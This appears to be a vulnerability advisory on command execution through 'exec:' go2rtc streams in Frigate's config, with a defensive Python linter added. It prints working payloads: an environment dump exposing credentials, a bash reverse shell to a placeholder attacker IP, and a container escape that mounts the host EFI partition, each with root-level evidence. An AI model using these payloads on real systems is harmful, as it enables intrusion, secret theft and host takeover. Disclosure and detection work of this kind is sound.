There is no indication that Frigate's built-in authentication has been bypassed. This vulnerability is only exploitable by an administrator, or on installs that have been exposed to the open internet with no authentication, which already gives anyone full administrative control.
1. Executive Summary
A critical Remote Command Execution (RCE) vulnerability has been identified in the Frigate integration with go2rtc.
The Real Problem: The application does not sanitize user input in the video stream configuration (config.yaml), allowing direct injection of system commands via the exec: directive.
The Root Cause: The go2rtc service executes these commands without restrictions. Since Frigate typically requires running in privileged mode (--privileged) to access hardware acceleration, this command execution allows the attacker not only to control the container but also to directly access the host's hardware and file system, breaking security isolation (Container Escape).
2. Technical Details
The application allows the editing of the config.yaml file, which is processed by the integrated go2rtc service. By defining a stream using the exec: prefix, go2rtc directly executes the specified binary.
Due to the standard privileged configuration, the process inherits extended capabilities (CAP_SYS_ADMIN), allowing it to mount physical disks and modify the host system boot.
3. Proof of Concept (PoC)
To successfully trigger the vulnerability, simply defining the stream is not enough; the stream must be active. This requires configuring a dummy camera to consume the malicious stream and performing a service restart via the UI.
3.1. Trigger Mechanism
The following configuration demonstrates how to link a fake camera to the malicious stream to force execution upon service restart.
Required Configuration Pattern:
cameras:
  poc_cam:
    enabled: true
    ffmpeg:
      inputs:
        - path: rtsp://127.0.0.1:8554/malicious_stream
          roles:
            - detect
    detect:
      enabled: false
    audio:
      enabled: false
go2rtc:
  streams:
    malicious_stream:
      - "exec:[PAYLOAD_COMMAND_HERE]"
After saving this configuration, a restart via the UI is required to trigger the execution.
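For the reviewer or operator side of sections 2 and 3.1, the following is an added example (not code from the advisory or from the Frigate or go2rtc projects): a small linter that walks an already-parsed Frigate config, flags every go2rtc stream whose source starts with "exec:", and reports which enabled cameras consume that stream through the local restream URL, since, as described above, an exec source only runs once a camera pulls it. The sample config is constructed to mirror the pattern shown in 3.1 plus one benign stream and one unreferenced exec stream; the 127.0.0.1:8554 URL shape, the `enabled` skip, and the severity labels are assumptions of this example. In practice the dict would come from `yaml.safe_load()` over config.yaml.

```python
"""Added example, not part of the advisory: flag go2rtc "exec:" stream
sources in a Frigate config and show which cameras would activate them."""

import re
from typing import Dict, List

# Assumption: cameras pull go2rtc streams via Frigate's local restream URL,
# as in the advisory's trigger config (rtsp://127.0.0.1:8554/<stream>).
RESTREAM_RE = re.compile(
    r"^rtsps?://(?:127\.0\.0\.1|localhost)(?::\d+)?/(?P<name>[^/?#]+)"
)

# Constructed sample config (same structure yaml.safe_load would return).
SAMPLE_CONFIG: dict = {
    "cameras": {
        "poc_cam": {
            "enabled": True,
            "ffmpeg": {"inputs": [
                {"path": "rtsp://127.0.0.1:8554/malicious_stream", "roles": ["detect"]}
            ]},
        },
        "front_door": {
            "enabled": True,
            "ffmpeg": {"inputs": [
                {"path": "rtsp://127.0.0.1:8554/front_door", "roles": ["detect"]}
            ]},
        },
    },
    "go2rtc": {
        "streams": {
            "malicious_stream": ["exec:[PAYLOAD_COMMAND_HERE]"],
            "front_door": "rtsp://192.0.2.10:554/stream1",      # benign, documentation IP
            "garage": ["exec:[SOME_COMMAND]"],                   # exec source nobody consumes
        }
    },
}


def exec_sources(config: dict) -> Dict[str, List[str]]:
    """Return {stream_name: [exec sources]} for go2rtc streams using exec:.
    A stream's sources may be a single string or a list of strings."""
    streams = (config.get("go2rtc") or {}).get("streams") or {}
    found: Dict[str, List[str]] = {}
    for name, sources in streams.items():
        if isinstance(sources, str):
            sources = [sources]
        hits = [s for s in sources
                if isinstance(s, str) and s.strip().lower().startswith("exec:")]
        if hits:
            found[name] = hits
    return found


def stream_consumers(config: dict) -> Dict[str, List[str]]:
    """Map each restreamed go2rtc stream name to the enabled cameras pulling it."""
    consumers: Dict[str, List[str]] = {}
    for cam_name, cam in (config.get("cameras") or {}).items():
        if cam.get("enabled", True) is False:   # assumption: disabled cameras never start ffmpeg
            continue
        for inp in ((cam.get("ffmpeg") or {}).get("inputs") or []):
            m = RESTREAM_RE.match(str(inp.get("path", "")))
            if m:
                consumers.setdefault(m.group("name"), []).append(cam_name)
    return consumers


def lint(config: dict) -> List[dict]:
    """One finding per exec: stream; 'critical' when a camera will activate it,
    otherwise 'high' (defined but dormant until something pulls the stream)."""
    consumers = stream_consumers(config)
    findings = []
    for stream, sources in exec_sources(config).items():
        cams = consumers.get(stream, [])
        findings.append({
            "stream": stream,
            "sources": sources,
            "cameras": cams,
            "severity": "critical" if cams else "high",
        })
    return findings


if __name__ == "__main__":
    for f in lint(SAMPLE_CONFIG):
        print(f"[{f['severity'].upper()}] go2rtc stream '{f['stream']}' uses exec: "
              f"{f['sources']}; consumed by cameras {f['cameras'] or 'none'}")
```

Run against a real deployment by replacing SAMPLE_CONFIG with `yaml.safe_load(open("/config/config.yaml"))`; any finding at all warrants a review of who can edit the config, and a "critical" one means the command runs on the next restart.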
3.2. Demonstrated Payloads
The following payloads were tested using the trigger mechanism described above.
PoC 1: Secrets and Environment Variable Exfiltration
Description: The attacker dumps the process environment to obtain credentials.
Payload:
go2rtc:
  streams:
    poc_env:
      - "exec:/bin/bash -c 'env > /config/evidence_secrets.txt; sleep 30'"
Evidence (cat /config/evidence_secrets.txt):
NVIDIA_VISIBLE_DEVICES=<REDACTED>
NVIDIA_DRIVER_CAPABILITIES=compute,utility,video
FRIGATE_RTSP_USER_CAM1=<REDACTED>
FRIGATE_RTSP_PASS_CAM1=<REDACTED>
FRIGATE_RTSP_USER_CAM2=<REDACTED>
FRIGATE_RTSP_PASS_CAM2=<REDACTED>
FRIGATE_OPENAI_API_KEY=<REDACTED>
DEFAULT_FFMPEG_VERSION=7.0
LIBAVFORMAT_VERSION_MAJOR=61
INCLUDED_FFMPEG_VERSIONS=7.0:5.0
HOSTNAME=102a3a185d16
HOME=/root
PWD=/run/s6-rc:s6-rc-init:fIPglo/servicedirs/go2rtc
PATH=/command:/usr/local/go2rtc/bin:/usr/local/tempio/bin:/usr/local/nginx/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PoC 2: Interactive Reverse Shell (Remote Control)
Description: A remote connection is established for interactive control.
Payload:
go2rtc:
  streams:
    poc_rev_shell:
      - "exec:/bin/bash -c 'bash -i >& /dev/tcp/[ATTACKER_IP]/4444 0>&1'"
Evidence (Attacker Terminal):
ubuntu@ubuntu:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.30 53156
bash: cannot set terminal process group (127): Inappropriate ioctl for device
bash: no job control in this shell
root@102a3a185d16:/run/s6-rc:s6-rc-init:fIPglo/servicedirs/go2rtc# id
uid=0(root) gid=0(root) groups=0(root)
PoC 3: Container Escape and Host Compromise
Description: The attacker mounts the physical host EFI partition inside the container, demonstrating total hardware control.
Payload:
go2rtc:
  streams:
    poc_escape:
      - "exec:/bin/bash -c 'mkdir -p /tmp/host_efi; mount /dev/nvme0n1p1 /tmp/host_efi; ls -R /tmp/host_efi > /config/evidence_host_efi.txt; sleep 60'"
Evidence (cat /config/evidence_host_efi.txt):
/tmp/host_efi:
EFI
/tmp/host_efi/EFI:
BOOT
ubuntu
/tmp/host_efi/EFI/BOOT:
BOOTX64.EFI
fbx64.efi
mmx64.efi
/tmp/host_efi/EFI/ubuntu:
BOOTX64.CSV
grub.cfg
grubx64.efi
mmx64.efi
shimx64.efi
4. Impact
Financial Impact: Exposure of payment API keys and external services.
Privacy Violation: Unauthorized access to video feeds and RTSP credentials.
Total Compromise: In privileged deployments, complete control of the physical host with the possibility of boot-level persistence.